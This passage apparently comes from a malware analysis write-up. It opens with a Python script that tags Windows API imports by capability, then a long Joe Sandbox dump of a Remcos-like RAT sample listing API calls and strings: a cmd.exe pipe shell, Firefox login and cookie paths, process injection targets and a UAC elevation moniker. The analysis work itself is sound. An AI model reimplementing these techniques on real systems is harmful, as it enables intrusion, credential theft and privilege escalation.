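• GetProcAddress.KERNEL32(00000000), ref: 0041CC11
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
• GetProcAddress.KERNEL32(00000000), ref: 0041CC86
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
• GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
• LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
• GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
"""

# Only the loader call names the module and export; the paired GetProcAddress
# line carries just the handle (00000000 in the dump), so it is skipped.
LINE_RE = re.compile(
    r"(?P<loader>LoadLibraryA|GetModuleHandleA)\.\w+\("
    r"(?P<lib>[^,()]+),(?P<fn>[^,()]+)"
    r"[^)]*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Assumed analyst labelling for this example: which exports imply which capability.
CAPABILITIES = {
    "process-injection": {"NtUnmapViewOfSection", "NtSuspendProcess", "NtResumeProcess"},
    "process-introspection": {"NtQueryInformationProcess", "GetProcessImageFileNameW", "IsWow64Process"},
    "privilege-check": {"IsUserAnAdmin"},
    "network-enumeration": {"GetExtendedTcpTable", "GetExtendedUdpTable"},
    "file-lock-handling": {"RmStartSession", "RmRegisterResources", "RmGetList", "RmEndSession"},
    "host-fingerprint": {"GlobalMemoryStatusEx", "GetSystemTimes", "GetComputerNameExW"},
    "display-enumeration": {"EnumDisplayDevicesW", "EnumDisplayMonitors", "GetMonitorInfoW"},
    "mitigation-tamper": {"SetProcessDEPPolicy"},
}


@dataclass(frozen=True)
class Resolved:
    library: str
    symbol: str               # export name, or "#<n>" for an ordinal import
    loader: str               # LoadLibraryA (loads) or GetModuleHandleA (already mapped)
    ref: str                  # address of the loader call in the dump
    ordinal: Optional[int] = None


def parse_resolver(text: str) -> list[Resolved]:
    """Turn the report's loader/GetProcAddress pairs into Resolved entries."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        lib, fn = m["lib"].strip(), m["fn"].strip()
        ordinal = None
        # A hex number in the export slot is an ordinal import (Shlwapi,0000000C);
        # heuristic, since a real export named by eight hex digits would be misread.
        if re.fullmatch(r"[0-9A-Fa-f]{8}", fn):
            ordinal = int(fn, 16)
            fn = f"#{ordinal}"
        entries.append(Resolved(lib, fn, m["loader"], m["ref"], ordinal))
    return entries


def triage(entries: list[Resolved]) -> dict[str, list[str]]:
    """Map capability tag -> sorted unique exports that triggered it."""
    hits: dict[str, set[str]] = defaultdict(set)
    for e in entries:
        for tag, names in CAPABILITIES.items():
            if e.symbol in names:
                hits[tag].add(e.symbol)
    return {tag: sorted(names) for tag, names in hits.items()}


def untagged(entries: list[Resolved]) -> list[str]:
    """Exports no rule covers; ordinal imports land here and need manual lookup."""
    known = set().union(*CAPABILITIES.values())
    return sorted({e.symbol for e in entries if e.symbol not in known})


def loaded_libraries(entries: list[Resolved]) -> list[str]:
    """Modules the sample pulls in with LoadLibraryA; GetModuleHandleA only
    returns modules already mapped, so those add nothing to the process."""
    return sorted({e.library for e in entries if e.loader == "LoadLibraryA"})


if __name__ == "__main__":
    found = parse_resolver(SAMPLE)
    for tag, names in triage(found).items():
        print(f"{tag:24s} {', '.join(names)}")
    print("untagged:", untagged(found), "loaded:", loaded_libraries(found))
```

Two points the output makes visible: GetProcessImageFileNameW is looked up in Psapi and then again in Kernel32 (the report shows both calls), which reads as a compatibility fallback rather than two distinct capabilities, so the tagger de-duplicates on export name; and the Shlwapi ordinal import is deliberately left untagged rather than guessed, because ordinal-to-name mapping must be checked against the DLL's export table on the target OS version.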

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                    • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                    • ExitProcess.KERNEL32 ref: 004432EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID: PkGNG
                                    • API String ID: 1703294689-263838557
                                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

                                    Control-flow Graph

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                    • SetEvent.KERNEL32(?), ref: 00404E43
                                    • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                    • closesocket.WS2_32(?), ref: 00404E5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                    • SetEvent.KERNEL32(?), ref: 00404EA2
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                    • SetEvent.KERNEL32(?), ref: 00404EBA
                                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                                    • SetEvent.KERNEL32(?), ref: 00404ED1
                                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                    • String ID: PkGNG
                                    • API String ID: 3658366068-263838557
                                    • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                    • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                                    Control-flow Graph

                                    control_flow_graph 30 448566-44857a 31 448587-4485a2 LoadLibraryExW 30->31 32 44857c-448585 30->32 34 4485a4-4485ad GetLastError 31->34 35 4485cb-4485d1 31->35 33 4485de-4485e0 32->33 36 4485bc 34->36 37 4485af-4485ba LoadLibraryExW 34->37 38 4485d3-4485d4 FreeLibrary 35->38 39 4485da 35->39 40 4485be-4485c0 36->40 37->40 38->39 41 4485dc-4485dd 39->41 40->35 42 4485c2-4485c9 40->42 41->33 42->41
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                    • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

                                    Control-flow Graph

                                    control_flow_graph 43 40d069-40d095 call 401fab CreateMutexA GetLastError
                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                    • GetLastError.KERNEL32 ref: 0040D083
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID: SG
                                    • API String ID: 1925916568-3189917014
                                    • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                    • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

                                    Control-flow Graph

                                    control_flow_graph 46 4484ca-4484f4 47 4484f6-4484f8 46->47 48 44855f 46->48 49 4484fe-448504 47->49 50 4484fa-4484fc 47->50 51 448561-448565 48->51 52 448506-448508 call 448566 49->52 53 448520 49->53 50->51 56 44850d-448510 52->56 55 448522-448524 53->55 57 448526-448534 GetProcAddress 55->57 58 44854f-44855d 55->58 59 448541-448547 56->59 60 448512-448518 56->60 61 448536-44853f call 43436e 57->61 62 448549 57->62 58->48 59->55 60->52 63 44851a 60->63 61->50 62->58 63->53
                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc__crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 2279764990-0
                                    • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                    • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                    • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                    • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

                                    Control-flow Graph

                                    control_flow_graph 80 446137-446143 81 446175-446180 call 4405dd 80->81 82 446145-446147 80->82 89 446182-446184 81->89 83 446160-446171 RtlAllocateHeap 82->83 84 446149-44614a 82->84 87 446173 83->87 88 44614c-446153 call 445545 83->88 84->83 87->89 88->81 92 446155-44615e call 442f80 88->92 92->81 92->83
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                    • DeleteFileA.KERNEL32(?), ref: 00408652
                                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                    • API String ID: 1067849700-181434739
                                    • Opcode ID: 3550356753090ff8d2e7e1df532b22bc2240acea58abd593ad1f807a75680658
                                    • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                    • Opcode Fuzzy Hash: 3550356753090ff8d2e7e1df532b22bc2240acea58abd593ad1f807a75680658
                                    • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                    • CloseHandle.KERNEL32 ref: 00405A23
                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                    • CloseHandle.KERNEL32 ref: 00405A45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                    • API String ID: 2994406822-18413064
                                    • Opcode ID: da1bdc8411f8e038db4cd2d7e88b66755248fa7fef226cae948f8866e4122cee
                                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                    • Opcode Fuzzy Hash: da1bdc8411f8e038db4cd2d7e88b66755248fa7fef226cae948f8866e4122cee
                                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                    • API String ID: 3018269243-13974260
                                    • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                    • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                    • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                    APIs
                                    • OpenClipboard.USER32 ref: 004168C2
                                    • EmptyClipboard.USER32 ref: 004168D0
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: !D@
                                    • API String ID: 3520204547-604454484
                                    • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                    • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$File$FirstNext
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 3527384056-432212279
                                    • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                                    • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                    • Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                                    • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4B9
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                    • API String ID: 3756808967-1743721670
                                    • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                    • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                    • API String ID: 0-1861860590
                                    • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                    • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                    APIs
                                    • _wcslen.LIBCMT ref: 00407521
                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Object_wcslen
                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    • API String ID: 240030777-3166923314
                                    • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                    • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                    Memory Dump Source
